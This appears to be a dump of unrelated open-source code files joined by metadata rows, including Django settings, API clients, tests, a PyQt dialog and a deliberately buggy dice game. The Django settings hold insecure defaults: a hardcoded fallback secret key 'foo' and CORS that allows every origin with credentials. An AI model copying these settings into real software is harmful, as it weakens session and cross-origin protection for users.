except FileNotFoundError:
print('安全でないキーを使用します。長期的な稼働は控えてください。')
SECRET_KEY = 'foo'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = ['127.0.0.1', 'localhost']
# Application definition
INSTALLED_APPS = [
'out_view',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'kakeibo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'kakeibo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'ja-jp'
TIME_ZONE = 'Asia/Tokyo'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = BASE_DIR + '/static/'
LOGIN_URL = '/admin/login/'
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
CORS_ALLOW_CREDENTIALS = True
CORS_ORIGIN_ALLOW_ALL = True
CORS_ALLOW_CREDENTIALS = True
CSRF_TRUSTED_ORIGINS = ['lifelog.515hikaru.net']
CORS_REPLACE_HTTPS_REFERER = True
CSRF_COOKIE_DOMAIN = 'lifelog.515hikaru.net'
CORS_ORIGIN_WHITELIST = ('https://lifelog.515hikaru.net',
'lifelog.515hikaru.net', '515hikaru.net', )
| mit | -4,153,100,942,513,246,700 | 25.985816 | 91 | 0.684363 | false | 3.297227 | false | false | false |
ltowarek/budget-supervisor | third_party/saltedge/swagger_client/models/removed_customer_response_data.py | 1 | 3772 | # coding: utf-8
"""
Salt Edge Account Information API
API Reference for services # noqa: E501
OpenAPI spec version: 5.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class RemovedCustomerResponseData(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'deleted': 'bool',
'id': 'int'
}
attribute_map = {
'deleted': 'deleted',
'id': 'id'
}
def __init__(self, deleted=True, id=None): # noqa: E501
"""RemovedCustomerResponseData - a model defined in Swagger""" # noqa: E501
self._deleted = None
self._id = None
self.discriminator = None
if deleted is not None:
self.deleted = deleted
if id is not None:
self.id = id
@property
def deleted(self):
"""Gets the deleted of this RemovedCustomerResponseData. # noqa: E501
:return: The deleted of this RemovedCustomerResponseData. # noqa: E501
:rtype: bool
"""
return self._deleted
@deleted.setter
def deleted(self, deleted):
"""Sets the deleted of this RemovedCustomerResponseData.
:param deleted: The deleted of this RemovedCustomerResponseData. # noqa: E501
:type: bool
"""
self._deleted = deleted
@property
def id(self):
"""Gets the id of this RemovedCustomerResponseData. # noqa: E501
:return: The id of this RemovedCustomerResponseData. # noqa: E501
:rtype: int
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this RemovedCustomerResponseData.
:param id: The id of this RemovedCustomerResponseData. # noqa: E501
:type: int
"""
self._id = id
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(RemovedCustomerResponseData, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, RemovedCustomerResponseData):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| mit | -6,301,179,382,600,332,000 | 26.735294 | 86 | 0.552227 | false | 4.24297 | false | false | false |
iofun/spider | spider/system/campaigns.py | 1 | 5125 | # -*- coding: utf-8 -*-
'''
Spider campaigns system logic.
'''
# This file is part of spider.
# Distributed under the terms of the last AGPL License.
# The full license is in the file LICENCE, distributed as part of this software.
__author__ = 'Team Machine'
import arrow
import motor
import uuid
import logging
from tornado import gen
from spider.messages import campaigns
#from spider.messages import inbound
from spider.tools import clean_structure, clean_results
class Campaigns(object):
'''
Spider campaigns
'''
@gen.coroutine
def get_campaign_list(self, account, status, page_num):
'''
Get campaign list
'''
page_num = int(page_num)
page_size = self.settings.get('page_size')
campaign_list = []
find_query = {'account':account}
logging.info(status)
if status != 'all':
find_query['status'] = status
query = self.db.campaigns.find(find_query, {'_id':0})
q = query.sort([('_id', -1)]).skip(int(page_num) * page_size).limit(page_size)
try:
while (yield query.fetch_next):
campaign = q.next_object()
campaign_list.append(campaign)
except Exception, e:
logging.exception(e)
raise gen.Return(e)
finally:
raise gen.Return(campaign_list)
@gen.coroutine
def get_campaign(self, account, campaign_uuid):
'''
Get campaign
'''
message = None
try:
result = yield self.db.campaigns.find_one(
{
'account':account,
'uuid':campaign_uuid},
{'_id':0}
)
if result:
campaign = campaigns.Campaign(result)
campaign.validate()
message = clean_structure(campaign)
except Exception, e:
logging.exception(e)
raise e
finally:
raise gen.Return(message)
@gen.coroutine
def new_campaign(self, struct):
'''
New campaign
'''
try:
campaign = campaigns.Campaign(struct)
campaign.validate()
campaign = clean_structure(campaign)
except Exception, e:
logging.error(e)
raise e
try:
result = yield self.db.campaigns.insert(campaign)
message = campaign.get('uuid')
except Exception, e:
logging.error(e)
message = str(e)
raise gen.Return(message)
@gen.coroutine
def modify_campaign(self, account, campaign_uuid, struct):
'''
Modify campaign
'''
try:
campaign = campaigns.ModifyCampaign(struct)
campaign.validate()
campaign = clean_structure(campaign)
except Exception, e:
logging.error(e)
raise e
logging.error(campaign)
try:
result = yield self.db.campaigns.update(
{'account':account,
'uuid':campaign_uuid},
{'$set':campaign}
)
logging.info(result)
except Exception, e:
logging.error(e)
message = str(e)
raise gen.Return(bool(result.get('n')))
@gen.coroutine
def replace_campaign(self, account, campaign_uuid, struct):
'''
Replace campaign
'''
try:
campaign = campaigns.Campaign(struct)
campaign.validate()
campaign = clean_structure(campaign)
except Exception, e:
logging.error(e)
raise e
try:
result = yield self.db.campaigns.update(
{'account':account,
'uuid':campaign_uuid},
{'$set':campaign}
)
logging.info(result)
except Exception, e:
logging.error(e)
message = str(e)
raise gen.Return(bool(result.get('n')))
@gen.coroutine
def remove_campaign(self, account, campaign_uuid):
'''
Remove campaign
'''
message = None
try:
message = yield self.db.campaigns.remove(
{'account':account, 'uuid':campaign_uuid}
)
except Exception, e:
logging.error(e)
message = str(e)
raise gen.Return(bool(message.get('n')))
# check_exist needs some testing.
@gen.coroutine
def check_exist(self, campaign_uuid):
'''
Check if a given campaign exist
'''
try:
exist = yield self.db.campaigns.find_one(
{'uuid': campaign_uuid},
{'uuid':1,
'name':1,
'_id':0})
exist = (True if exist else False)
except Exception, e:
logging.error(e)
message = str(e)
raise gen.Return(exist) | agpl-3.0 | 1,334,203,877,906,721,300 | 24.758794 | 86 | 0.50478 | false | 4.472077 | false | false | false |
dksr/graph_utils | weisfeiler_lehman_graph_isomorphism_test.py | 1 | 1864 | from igraph import Graph
def weisfeiler_lehman_graph_isomorphism_test(G1,G2):
""" Performs the Weisfeiler-Lehman test of Isomorphism:
Weisfeiler and Lehman: A reduction of a graph to a canonical form
and an algebra arising during this reduction,
Nauchno-Technicheskaya Informatsiya, Ser. 2, no. 9 (1968), 12-16 (in Russian).
I used this paper to implement the algorithm:
Nino Shervashidze et.al.: Weisfeiler-Lehman Graph Kernels, Journal of Machine Learning Research (2011)
"""
name_codes = {}
MAX_ITRES = 2
node_count = 0
compressed_labels = {}
for h in range(MAX_ITRES):
multi_set_labels = {}
for g in [G1, G2]:
multi_set_labels[g['name']] = {}
for node in g.vs:
neighbours = g.neighbors(node)
lables = g.vs[neighbours]['name']
lables.sort()
new_node_name = node['name'] + '_'.join(lables)
multi_set_labels[g['name']][node.index] = new_node_name
if new_node_name not in compressed_labels:
compressed_labels[new_node_name] = 'c' + repr(node_count)
print new_node_name, compressed_labels[new_node_name]
node_count += 1
for g in [G1, G2]:
for node in g.vs:
node['name'] = compressed_labels[multi_set_labels[g['name']][node.index]]
if __name__ == '__main__':
G1 = Graph([(0,4), (1,4), (4,5), (3,5), (3,4), (2,5), (2,3)])
G2 = Graph([(0,4), (1,3), (4,5), (3,5), (3,4), (2,5), (2,4)])
G1.vs["name"] = ["1", "1", "2", "3", "4", "5"]
G2.vs["name"] = ["1", "2", "2", "3", "4", "5"]
G1["name"] = 'G1'
G2["name"] = 'G2'
weisfeiler_lehman_graph_isomorphism_test(G1, G2)
print G1
print G2 | mit | -2,112,818,726,911,263,500 | 37.854167 | 106 | 0.521459 | false | 3.055738 | false | false | false |
jnewland/ha-config | custom_components/senseme/config_flow.py | 1 | 2995 | """Config flow for SenseME."""
import ipaddress
import voluptuous as vol
from aiosenseme import async_get_device_by_ip_address, discover_all
from homeassistant import config_entries
from homeassistant.const import CONF_HOST
from .const import CONF_HOST_MANUAL, CONF_INFO, DOMAIN
DISCOVER_TIMEOUT = 5
class SensemeFlowHandler(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle SenseME discovery config flow."""
VERSION = 1
CONNECTION_CLASS = config_entries.CONN_CLASS_LOCAL_PUSH
def __init__(self) -> None:
"""Initialize the SenseME config flow."""
self._discovered_devices = None
async def _async_entry_for_device(self, device):
"""Create a config entry for a device."""
await self.async_set_unique_id(device.uuid)
self._abort_if_unique_id_configured()
return self.async_create_entry(
title=device.name,
data={CONF_INFO: device.get_device_info},
)
async def async_step_manual(self, user_input=None):
"""Handle manual entry of an ip address."""
errors = {}
if user_input is not None:
host = user_input[CONF_HOST]
try:
ipaddress.ip_address(host)
except ValueError:
errors[CONF_HOST] = "invalid_host"
else:
device = await async_get_device_by_ip_address(host)
if device is not None:
return await self._async_entry_for_device(device)
errors[CONF_HOST] = "cannot_connect"
return self.async_show_form(
step_id="manual",
data_schema=vol.Schema({vol.Required(CONF_HOST): str}),
errors=errors,
)
async def async_step_user(self, user_input=None):
"""Handle a flow initialized by the user."""
# start discovery the first time through
if self._discovered_devices is None:
self._discovered_devices = await discover_all(DISCOVER_TIMEOUT)
current_ids = self._async_current_ids()
device_selection = [
device.name
for device in self._discovered_devices
if device.uuid not in current_ids
]
if not device_selection:
return await self.async_step_manual(user_input=None)
device_selection.append(CONF_HOST_MANUAL)
if user_input is not None:
if user_input[CONF_HOST] == CONF_HOST_MANUAL:
return await self.async_step_manual()
for device in self._discovered_devices:
if device == user_input[CONF_HOST]:
return await self._async_entry_for_device(device)
return self.async_show_form(
step_id="user",
data_schema=vol.Schema(
{
vol.Optional(CONF_HOST, default=device_selection[0]): vol.In(
device_selection
)
}
),
)
| mit | 3,527,471,452,215,158,000 | 32.277778 | 81 | 0.582638 | false | 4.200561 | true | false | false |
ssls/beetle-agent | tests/modules/teams/resources/test_modifying_teams.py | 1 | 4600 | # encoding: utf-8
# pylint: disable=missing-docstring
import json
from app.modules.teams import models
def test_new_team_creation(flask_app_client, db, regular_user):
# pylint: disable=invalid-name
team_title = "Test Team Title"
with flask_app_client.login(regular_user, auth_scopes=('teams:write', )):
response = flask_app_client.post('/api/v1/teams/', data={'title': team_title})
assert response.status_code == 200
assert response.content_type == 'application/json'
assert set(response.json.keys()) >= {'id', 'title'}
assert response.json['title'] == team_title
# Cleanup
team = models.Team.query.get(response.json['id'])
assert team.title == team_title
db.session.delete(team)
db.session.commit()
def test_new_team_creation_with_invalid_data_must_fail(flask_app_client, regular_user):
# pylint: disable=invalid-name
with flask_app_client.login(regular_user, auth_scopes=('teams:write', )):
response = flask_app_client.post('/api/v1/teams/', data={'title': ""})
assert response.status_code == 409
assert response.content_type == 'application/json'
assert set(response.json.keys()) >= {'status', 'message'}
def test_update_team_info(flask_app_client, regular_user, team_for_regular_user):
# pylint: disable=invalid-name
team_title = "Test Team Title"
with flask_app_client.login(regular_user, auth_scopes=('teams:write', )):
response = flask_app_client.patch(
'/api/v1/teams/%d' % team_for_regular_user.id,
content_type='application/json',
data=json.dumps((
{
'op': 'replace',
'path': '/title',
'value': team_title
},
))
)
assert response.status_code == 200
assert response.content_type == 'application/json'
assert set(response.json.keys()) >= {'id', 'title'}
assert response.json['id'] == team_for_regular_user.id
assert response.json['title'] == team_title
assert team_for_regular_user.title == team_title
def test_update_team_info_with_invalid_data_must_fail(
flask_app_client,
regular_user,
team_for_regular_user
):
# pylint: disable=invalid-name
with flask_app_client.login(regular_user, auth_scopes=('teams:write', )):
response = flask_app_client.patch(
'/api/v1/teams/%d' % team_for_regular_user.id,
content_type='application/json',
data=json.dumps((
{
'op': 'replace',
'path': '/title',
'value': '',
},
))
)
assert response.status_code == 409
assert response.content_type == 'application/json'
assert set(response.json.keys()) >= {'status', 'message'}
def test_team_deletion(flask_app_client, regular_user, team_for_regular_user):
with flask_app_client.login(regular_user, auth_scopes=('teams:write', )):
response = flask_app_client.delete(
'/api/v1/teams/%d' % team_for_regular_user.id
)
assert response.status_code == 200
assert response.content_type == 'application/json'
def test_add_new_team_member(flask_app_client, db, regular_user, admin_user, team_for_regular_user):
# pylint: disable=invalid-name
with flask_app_client.login(regular_user, auth_scopes=('teams:write', )):
response = flask_app_client.post(
'/api/v1/teams/%d/members/' % team_for_regular_user.id,
data={
'user_id': admin_user.id,
}
)
assert response.status_code == 200
assert response.content_type == 'application/json'
assert set(response.json.keys()) >= {'team', 'user', 'is_leader'}
assert response.json['team']['id'] == team_for_regular_user.id
assert response.json['user']['id'] == admin_user.id
# Cleanup
team_members = models.TeamMember.query.filter_by(team=team_for_regular_user, user=admin_user)
assert team_members.count() == 1
team_members.delete()
db.session.commit()
def test_delete_team_member(
flask_app_client, db, regular_user, readonly_user, team_for_regular_user
):
# pylint: disable=invalid-name,unused-argument
with flask_app_client.login(regular_user, auth_scopes=('teams:write', )):
response = flask_app_client.delete(
'/api/v1/teams/%d/members/%d' % (team_for_regular_user.id, readonly_user.id),
)
assert response.status_code == 200
assert response.content_type == 'application/json'
| mit | 1,529,536,958,977,042,000 | 35.220472 | 100 | 0.61587 | false | 3.588144 | true | false | false |
spiside/pdb-tutorial | solutions/dicegame/runner.py | 1 | 1693 | from .die import Die
from .utils import i_just_throw_an_exception
class GameRunner:
def __init__(self):
self.dice = Die.create_dice(5)
self.reset()
def reset(self):
self.round = 1
self.wins = 0
self.loses = 0
@property
def answer(self):
total = 0
for die in self.dice:
total += die.value
return total
@classmethod
def run(cls):
count = 0
runner = cls()
while True:
print("Round {}\n".format(runner.round))
for die in runner.dice:
print(die.show())
guess = input("Sigh. What is your guess?: ")
guess = int(guess)
if guess == runner.answer:
print("Congrats, you can add like a 5 year old...")
runner.wins += 1
count += 1
runner.consecutive_wins += 1
else:
print("Sorry that's wrong")
print("The answer is: {}".format(runner.answer))
print("Like seriously, how could you mess that up")
runner.loses += 1
count = 0
print("Wins: {} Loses {}".format(runner.wins, runner.loses))
runner.round += 1
if count == 6:
print("You won... Congrats...")
print("The fact it took you so long is pretty sad")
break
prompt = input("Would you like to play again?[Y/n]: ")
if prompt.lower() == 'y' or prompt == '':
continue
else:
break
| mit | -5,400,822,887,541,992,000 | 26.216667 | 72 | 0.453042 | false | 4.408854 | false | false | false |
joseandro/liToCNF | sValidator.py | 1 | 1230 | # This module validates inequations along with their solutions
# Author: Joseandro Luiz
def isValid(cnf, res):
"""
This function validates a CNF
@rtype: bool
"""
# Turn all variables from CNF positive (we have to compare them later)
andBoolClause = None
for i in cnf :
orBoolClause = None
for j, val in enumerate(i) :
isFound = False
modVal = val
orBool = None
if modVal < 0:
modVal *= -1
try:
if res.index(modVal) >= 0:
isFound = True
except ValueError:
pass
if isFound == True:
if j > 0:
orBool = True
else:
orBool = False
elif i[j] > 0:
orBool = False
else:
orBool = True
if orBoolClause == None:
orBoolClause = orBool
else:
orBoolClause = orBoolClause or orBool
if andBoolClause is None:
andBoolClause = orBoolClause
else:
andBoolClause = andBoolClause and orBoolClause
return andBoolClause | gpl-3.0 | -8,536,422,730,506,171,000 | 25.76087 | 74 | 0.481301 | false | 4.641509 | false | false | false |
manashmndl/LearningPyQt | pyqt/chap11/contactdlg.py | 1 | 5621 | #!/usr/bin/env python
# Copyright (c) 2008-14 Qtrac Ltd. All rights reserved.
# This program or module is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 2 of the License, or
# version 3 of the License, or (at your option) any later version. It is
# provided for educational purposes and is distributed in the hope that
# it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See
# the GNU General Public License for more details.
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from future_builtins import *
import sys
from PyQt4.QtCore import (QVariant, Qt)
from PyQt4.QtGui import (QApplication, QComboBox, QDialog,
QDialogButtonBox, QGridLayout, QLabel, QLineEdit, QVBoxLayout)
class ContactDlg(QDialog):
StyleSheet = """
QComboBox { color: darkblue; }
QLineEdit { color: darkgreen; }
QLineEdit[mandatory="true"] {
background-color: rgb(255, 255, 127);
color: darkblue;
}
"""
def __init__(self, parent=None):
super(ContactDlg, self).__init__(parent)
self.create_widgets()
self.layout_widgets()
self.create_connections()
self.lineedits = (self.forenameEdit, self.surnameEdit,
self.companyEdit, self.phoneEdit, self.emailEdit)
for lineEdit in self.lineedits:
lineEdit.setProperty("mandatory", QVariant(True))
lineEdit.textEdited.connect(self.updateUi)
self.categoryComboBox.activated[int].connect(self.updateUi)
self.setStyleSheet(ContactDlg.StyleSheet)
self.setWindowTitle("Add Contact")
# An alternative would be to not create the QLabels but instead use a
# QFormLayout
def create_widgets(self):
self.forenameLabel = QLabel("&Forename:")
self.forenameEdit = QLineEdit()
self.forenameLabel.setBuddy(self.forenameEdit)
self.surnameLabel = QLabel("&Surname:")
self.surnameEdit = QLineEdit()
self.surnameLabel.setBuddy(self.surnameEdit)
self.categoryLabel = QLabel("&Category:")
self.categoryComboBox = QComboBox()
self.categoryLabel.setBuddy(self.categoryComboBox)
self.categoryComboBox.addItems(["Business", "Domestic",
"Personal"])
self.companyLabel = QLabel("C&ompany:")
self.companyEdit = QLineEdit()
self.companyLabel.setBuddy(self.companyEdit)
self.addressLabel = QLabel("A&ddress:")
self.addressEdit = QLineEdit()
self.addressLabel.setBuddy(self.addressEdit)
self.phoneLabel = QLabel("&Phone:")
self.phoneEdit = QLineEdit()
self.phoneLabel.setBuddy(self.phoneEdit)
self.mobileLabel = QLabel("&Mobile:")
self.mobileEdit = QLineEdit()
self.mobileLabel.setBuddy(self.mobileEdit)
self.faxLabel = QLabel("Fa&x:")
self.faxEdit = QLineEdit()
self.faxLabel.setBuddy(self.faxEdit)
self.emailLabel = QLabel("&Email:")
self.emailEdit = QLineEdit()
self.emailLabel.setBuddy(self.emailEdit)
self.buttonBox = QDialogButtonBox(QDialogButtonBox.Ok|
QDialogButtonBox.Cancel)
addButton = self.buttonBox.button(QDialogButtonBox.Ok)
addButton.setText("&Add")
addButton.setEnabled(False)
def layout_widgets(self):
grid = QGridLayout()
grid.addWidget(self.forenameLabel, 0, 0)
grid.addWidget(self.forenameEdit, 0, 1)
grid.addWidget(self.surnameLabel, 0, 2)
grid.addWidget(self.surnameEdit, 0, 3)
grid.addWidget(self.categoryLabel, 1, 0)
grid.addWidget(self.categoryComboBox, 1, 1)
grid.addWidget(self.companyLabel, 1, 2)
grid.addWidget(self.companyEdit, 1, 3)
grid.addWidget(self.addressLabel, 2, 0)
grid.addWidget(self.addressEdit, 2, 1, 1, 3)
grid.addWidget(self.phoneLabel, 3, 0)
grid.addWidget(self.phoneEdit, 3, 1)
grid.addWidget(self.mobileLabel, 3, 2)
grid.addWidget(self.mobileEdit, 3, 3)
grid.addWidget(self.faxLabel, 4, 0)
grid.addWidget(self.faxEdit, 4, 1)
grid.addWidget(self.emailLabel, 4, 2)
grid.addWidget(self.emailEdit, 4, 3)
layout = QVBoxLayout()
layout.addLayout(grid)
layout.addWidget(self.buttonBox)
self.setLayout(layout)
def create_connections(self):
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
def updateUi(self):
mandatory = self.companyEdit.property("mandatory").toBool()
if self.categoryComboBox.currentText() == "Business":
if not mandatory:
self.companyEdit.setProperty("mandatory", QVariant(True))
elif mandatory:
self.companyEdit.setProperty("mandatory", QVariant(False))
if (mandatory !=
self.companyEdit.property("mandatory").toBool()):
self.setStyleSheet(ContactDlg.StyleSheet)
enable = True
for lineEdit in self.lineedits:
if (lineEdit.property("mandatory").toBool() and
lineEdit.text().isEmpty()):
enable = False
break
self.buttonBox.button(QDialogButtonBox.Ok).setEnabled(enable)
if __name__ == "__main__":
app = QApplication(sys.argv)
form = ContactDlg()
form.show()
app.exec_()
| mit | 7,333,913,285,468,876,000 | 38.584507 | 74 | 0.654688 | false | 3.906185 | false | false | false |
tylerclair/py3canvas | py3canvas/apis/user_observees.py | 1 | 5486 | """UserObservees API Version 1.0.
This API client was generated using a template. Make sure this code is valid before using it.
"""
import logging
from datetime import date, datetime
from .base import BaseCanvasAPI
class UserObserveesAPI(BaseCanvasAPI):
"""UserObservees API Version 1.0."""
def __init__(self, *args, **kwargs):
"""Init method for UserObserveesAPI."""
super(UserObserveesAPI, self).__init__(*args, **kwargs)
self.logger = logging.getLogger("py3canvas.UserObserveesAPI")
def list_observees(self, user_id, include=None):
"""
List observees.
List the users that the given user is observing.
*Note:* all users are allowed to list their own observees. Administrators can list
other users' observees.
"""
path = {}
data = {}
params = {}
# REQUIRED - PATH - user_id
"""ID"""
path["user_id"] = user_id
# OPTIONAL - include
"""- "avatar_url": Optionally include avatar_url."""
if include is not None:
self._validate_enum(include, ["avatar_url"])
params["include"] = include
self.logger.debug("GET /api/v1/users/{user_id}/observees with query params: {params} and form data: {data}".format(params=params, data=data, **path))
return self.generic_request("GET", "/api/v1/users/{user_id}/observees".format(**path), data=data, params=params, all_pages=True)
def add_observee_with_credentials(self, user_id, access_token=None, observee_password=None, observee_unique_id=None):
"""
Add an observee with credentials.
Register the given user to observe another user, given the observee's credentials.
*Note:* all users are allowed to add their own observees, given the observee's
credentials or access token are provided. Administrators can add observees given credentials, access token or
the {api:UserObserveesController#update observee's id}.
"""
path = {}
data = {}
params = {}
# REQUIRED - PATH - user_id
"""ID"""
path["user_id"] = user_id
# OPTIONAL - observee[unique_id]
"""The login id for the user to observe. Required if access_token is omitted."""
if observee_unique_id is not None:
data["observee[unique_id]"] = observee_unique_id
# OPTIONAL - observee[password]
"""The password for the user to observe. Required if access_token is omitted."""
if observee_password is not None:
data["observee[password]"] = observee_password
# OPTIONAL - access_token
"""The access token for the user to observe. Required if <tt>observee[unique_id]</tt> or <tt>observee[password]</tt> are omitted."""
if access_token is not None:
data["access_token"] = access_token
self.logger.debug("POST /api/v1/users/{user_id}/observees with query params: {params} and form data: {data}".format(params=params, data=data, **path))
return self.generic_request("POST", "/api/v1/users/{user_id}/observees".format(**path), data=data, params=params, single_item=True)
def show_observee(self, user_id, observee_id):
"""
Show an observee.
Gets information about an observed user.
*Note:* all users are allowed to view their own observees.
"""
path = {}
data = {}
params = {}
# REQUIRED - PATH - user_id
"""ID"""
path["user_id"] = user_id
# REQUIRED - PATH - observee_id
"""ID"""
path["observee_id"] = observee_id
self.logger.debug("GET /api/v1/users/{user_id}/observees/{observee_id} with query params: {params} and form data: {data}".format(params=params, data=data, **path))
return self.generic_request("GET", "/api/v1/users/{user_id}/observees/{observee_id}".format(**path), data=data, params=params, single_item=True)
def add_observee(self, user_id, observee_id):
"""
Add an observee.
Registers a user as being observed by the given user.
"""
path = {}
data = {}
params = {}
# REQUIRED - PATH - user_id
"""ID"""
path["user_id"] = user_id
# REQUIRED - PATH - observee_id
"""ID"""
path["observee_id"] = observee_id
self.logger.debug("PUT /api/v1/users/{user_id}/observees/{observee_id} with query params: {params} and form data: {data}".format(params=params, data=data, **path))
return self.generic_request("PUT", "/api/v1/users/{user_id}/observees/{observee_id}".format(**path), data=data, params=params, single_item=True)
def remove_observee(self, user_id, observee_id):
"""
Remove an observee.
Unregisters a user as being observed by the given user.
"""
path = {}
data = {}
params = {}
# REQUIRED - PATH - user_id
"""ID"""
path["user_id"] = user_id
# REQUIRED - PATH - observee_id
"""ID"""
path["observee_id"] = observee_id
self.logger.debug("DELETE /api/v1/users/{user_id}/observees/{observee_id} with query params: {params} and form data: {data}".format(params=params, data=data, **path))
return self.generic_request("DELETE", "/api/v1/users/{user_id}/observees/{observee_id}".format(**path), data=data, params=params, single_item=True)
| mit | -4,811,413,284,564,236,000 | 36.834483 | 174 | 0.603172 | false | 3.640345 | false | false | false |
caoziyao/weibo | models/messageCopy.py | 1 | 1245 | import hashlib
import os
from . import ModelMixin
from . import db
from utils import timestamp
from utils import log
from utils import sh1hexdigest
class MessageCopy(db.Model, ModelMixin):
__tablename__ = 'messageCopys'
Cid = db.Column(db.Integer, primary_key=True) # 转发编号
# Ccontent = db.Column(db.String(150)) # 转发内容
# Cdatetime = db.Column(db.Integer) # 转发时间
# 外键
# u_id = db.Column(db.Integer, db.ForeignKey('users.Uid')) # 用户编号
m_follow_id = db.Column(db.Integer, db.ForeignKey('messages.Mid')) # 消息编号
m_fans_id = db.Column(db.Integer, db.ForeignKey('messages.Mid')) # 消息编号
# 定义一个关系
# 自动关联 不用手动查询就有数据
# user = db.relationship('User', backref='messageCopy', foreign_keys='MessageCopy.u_id')
m_follow = db.relationship('Message', backref='messagCopyFollow', foreign_keys='MessageCopy.m_follow_id')
m_fans = db.relationship('Message', backref='messagCopyFans', foreign_keys='MessageCopy.m_fans_id')
def __init__(self):
super(MessageCopy, self).__init__()
# self.Ccontent = form.get('content', '')
# self.Cdatetime = timestamp()
| mit | -8,593,585,503,986,119,000 | 35.03125 | 110 | 0.651344 | false | 2.933842 | false | false | false |
google/graphicsfuzz | gfauto/gfauto/run_bin.py | 1 | 2346 | # -*- coding: utf-8 -*-
# Copyright 2019 The GraphicsFuzz Project Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Runs a binary from the given binary name and settings file."""
import argparse
import subprocess
import sys
from pathlib import Path
from typing import List
from gfauto import binaries_util, settings_util
from gfauto.gflogging import log
def main() -> int:
parser = argparse.ArgumentParser(
description="Runs a binary given the binary name and settings.json file. "
"Use -- to separate args to run_bin and your binary. "
)
parser.add_argument(
"--settings",
help="Path to the settings JSON file for this instance.",
default=str(settings_util.DEFAULT_SETTINGS_FILE_PATH),
)
parser.add_argument(
"binary_name",
help="The name of the binary to run. E.g. spirv-opt, glslangValidator",
type=str,
)
parser.add_argument(
"arguments",
metavar="arguments",
type=str,
nargs="*",
help="The arguments to pass to the binary",
)
parsed_args = parser.parse_args(sys.argv[1:])
# Args.
settings_path: Path = Path(parsed_args.settings)
binary_name: str = parsed_args.binary_name
arguments: List[str] = parsed_args.arguments
try:
settings = settings_util.read_or_create(settings_path)
except settings_util.NoSettingsFile:
log(f"Settings file {str(settings_path)} was created for you; using this.")
settings = settings_util.read_or_create(settings_path)
binary_manager = binaries_util.get_default_binary_manager(settings=settings)
cmd = [str(binary_manager.get_binary_path_by_name(binary_name).path)]
cmd.extend(arguments)
return subprocess.run(cmd, check=False).returncode
if __name__ == "__main__":
sys.exit(main())
| apache-2.0 | 3,527,463,983,964,285,000 | 29.868421 | 83 | 0.684996 | false | 3.884106 | false | false | false |
masayuko/nikola | nikola/post.py | 1 | 47243 | # -*- coding: utf-8 -*-
# Copyright © 2012-2015 Roberto Alsina and others.
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
